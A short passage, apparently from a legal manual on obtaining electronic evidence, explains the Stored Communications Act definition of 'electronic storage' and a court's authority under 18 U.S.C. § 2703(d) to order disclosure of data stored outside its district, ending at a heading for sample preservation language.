Cover art courtesy of Greg Kipper.
[…] temporary, intermediate storage of a wire or electronic communication incidental to the
electronic transmission thereof; and any storage of such communication by an electronic
communication service for purposes of backup protection of such communication.” The
government does not seek access to any such materials. Communications not in “electronic
storage” include any e-mail communications received by the specified accounts that the
owner or user of the account has already accessed, viewed, or downloaded.
2
18 U.S.C. § 3127(2)(A) defines the term “court of competent jurisdiction” as including
“a district court of the United States (including a magistrate of such a court) or a United
States Court of Appeals.” Because 18 U.S.C. § 2703(d) expressly permits “any” such court
to issue an order, this Court may enter an order dir ecting the disclosure of such
information even if the information is stored outside of this judicial District.
Appendix C: Sample Language for Preservation